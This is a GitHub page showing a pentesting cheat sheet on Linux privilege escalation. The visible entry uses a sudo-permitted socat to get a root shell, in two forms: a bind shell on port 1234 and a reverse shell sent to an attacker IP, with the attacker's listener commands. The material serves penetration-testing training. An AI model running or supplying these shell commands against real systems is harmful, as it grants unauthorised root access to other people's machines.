Skip to content

Latest commit

 

History

History
210 lines (184 loc) · 7.52 KB

Linux_Privilege_Escalation_2.md

File metadata and controls

210 lines (184 loc) · 7.52 KB

TRICKS and TIPS


socat,scp,tmux,ed,sed,pip,git,cp,taskset,xxd,cat,Find,wget,zip,apt,cronjob,automation script,nfs

  • 1)Linux For Pentester: socat Privilege Escalation
    sudo rights sudo -l
    test ALL=(root) NOPASSWD: /usr/bin/socat
    method 1)
    Victim: sudo socat TCP4-LISTEN:1234, reuseaddr EXEC:"/bin/sh"
    Attacker: socat – TCP4:192.168.1.100:1234
    Method 2)
    Victim:sudo socat exec:'sh –li' ,pty,stderr,setsid,sigint,sane tcp:192.168.1.106:1234
    Attacker: socat file: 'tty',raw,echo=0 tcp-listen:1234

Reference: https://www.hackingarticles.in/linux-for-pentester-socat-privilege-escalation/